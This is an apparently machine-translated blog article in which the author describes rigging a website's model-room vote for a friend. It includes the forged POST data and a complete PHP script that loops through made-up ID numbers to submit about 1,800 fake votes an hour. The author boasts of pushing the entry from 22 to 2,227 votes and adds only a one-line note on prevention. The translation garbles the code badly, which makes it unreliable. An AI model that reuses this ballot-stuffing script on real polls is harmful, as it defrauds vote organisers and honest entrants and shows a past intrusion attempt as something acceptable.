Cheating and prevention in the voting system

Author: fhod

Please refer to the original source for reprinting the article "evil" first

A friend asked me for help a few days ago. said to be voting for a model room on a website. is there a way to help him get the first pass. naturally, I agreed. then a friend sent the website .. I have read about asp .. server Security is doing well .. no program vulnerabilities found .. after intrusion by bypass Elevation of Privilege. the Administrator is really abnormal .. it was intended to modify the database. I just read the code for voting to find the database connection file. it was kicked by management .. then let it go .. after a few days, my friend reminded me again .. I had to read it again .. all vulnerabilities have been completed ..

We can start from the vote directly. We hope we can find a breakthrough to directly achieve the purpose of vote collection. Option 1.



The name of a friend's model room is "FengHua corridor". Therefore, in Figure 1, I checked "FengHua corridor". A maximum of 10 items can be selected .. name. contact number. all ID card numbers are fictitious. after repeated voting tests. this voting system only verifies the ID card number .. assume that the ID card number is 1234567890. the name is test. contact number: 13013011111. You only need to change the ID card number to another number. for example, you can cast another vote for 1234567891 .. IP address and cookies are not verified. the purpose of ticket swiping can be fully achieved ..

Figure 2 shows the successful voting packets.


Aname = % B7 % E7 % 26% 3B % BB % AA % C0 % C8 & username = % B2 % E2 % CA % D4 & tel = 238226% & idcord = 13013011111 & Submit = % CC % E1 % BD % BB

Construct a URL Based on the Data Packet

Http://www.xxxx.com/ad/20061221/a.asp? Action = add & Aname = % B7 % E7 % 26% 3B % BB % AA %... 238226% & idcord = 13013011111 & Submit = % CC % E1 % BD % BB

When you open this page directly in IE, A 3 prompt will appear.



But as long as we change idcord = 1234567890 to idcord = 1234567891, a successful voting dialog box will appear. after knowing the defects of the voting system .. now I want to find a way to use the program to get votes ..

Write a package program and set idcord as a variable. then, each time the data is sent, a number is generated for the variable. for example, if idcord = 1234567 ** 9 is recycled once, idcord = 1234567*79 automatically changes the value ..

This program uses VB. C. ASP, which is not hard to implement in PHP. The following describes the PHP code written by TTFCT, the brother of EST.

Complete program code (the target website has been processed accordingly) <? Php
Error_reporting (0 );
Ini_set ("max_execution_time", 0 );
Ini_set ("default_socket_timeout", 2 );
Print_r (Voting ....);
For ($ I = 0; $ I <= 9; $ I ++)
For ($ j = 0; $ j <= 9; $ j ++)
For ($ k = 0; $ k <= 9; $ k ++)
For ($ l = 0; $ l <= 9; $ l ++)
{
$ Packet = "POST/ad/20061221/a. asp? Action = add HTTP/1.1 ";
$ Packet. = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/*";
$ Packet. = "Referer: http // www.xxx.com/ad/20061221/a.asp ";
$ Packet. = "Accept-Language: zh-cn ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded ";
$ Packet. = "Accept-Encoding: gzip, deflate ";
$ Packet. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon )";
$ Packet. = "Host: www.xxx.com ";
$ Packet. = "Content-Length: 113 ";
$ Packet. = "Connection: Keep-Alive ";
$ Packet. = "Cache-Control: no-cache ";
$ Packet. = "Cookie: ASPSESSIONIDASDCQDBT = NKKJPDLAMAMNHJHHNBBLOCCH ";
$ Packet. = "Aname = % B7 % E7 % 26% 3B % BB % AA % C0 % C8 & username = % B2 % E2 % CA % D4 & tel = 238226% & idcord = 13013011111". $ I. $ j. $ k. $ l. "90 & Submit = % CC % E1 % BD % BB ";
If ($ fp = fsockopen ("www.xxx.com", 80, $ errno, $ errstr, 50 ))
If (fwrite ($ fp, $ packet, strlen ($ packet )))
Print_r (

Success to vote
);
Sleep (2 );
Print_r (

Wait for 2 seconds
);
}
?>
PHP users can see at a glance that this is only a package sending program .. ini_set ("default_socket_timeout", 2); The interval for sending data packets is 2 seconds.
For ($ I = 0; $ I <= 9; $ I ++)
For ($ j = 0; $ j <= 9; $ j ++)
For ($ k = 0; $ k <= 9; $ k ++)
For ($ l = 0; $ l <= 9; $ l ++)
Four variables are set. in the following packet .. idcord = 1234 ". $ I. $ j. $ k. $ l. "90 automatically generate an idcord as a non-repeating Value

Write it using the program .. next we will start to brush the ticket .. because it is a PHP program .. so we need to find a space that supports PHP to run .. even if there is no space, just install AppServ .. appServ can be downloaded at http://www.skycn.com/soft/13703.htmlfor free. The installation process is very simple.. so let's leave it alone ..

First, let's take a look at the number of votes before the ticket is received...



From figure 4, we can see that it is 22 votes... then we execute the PHP code ..

5 ..


If "Success to vote" appears, the voting is successful ..

Because I set a two-second vote, and one hour is 1800 votes, after more than an hour, the number of votes in "FengHua Gallery" is 2227 votes. Figure 6



My friend's work took the first place of course, and I also got a rich lunch.

In fact, such a voting program only requires cookies for verification .. one IP can only vote for one ticket .. interval of each vote .. and so on. this article does not teach you how to vote. I just want to let everyone know how to vote .. and how to prevent it while knowing how to brush the ticket ..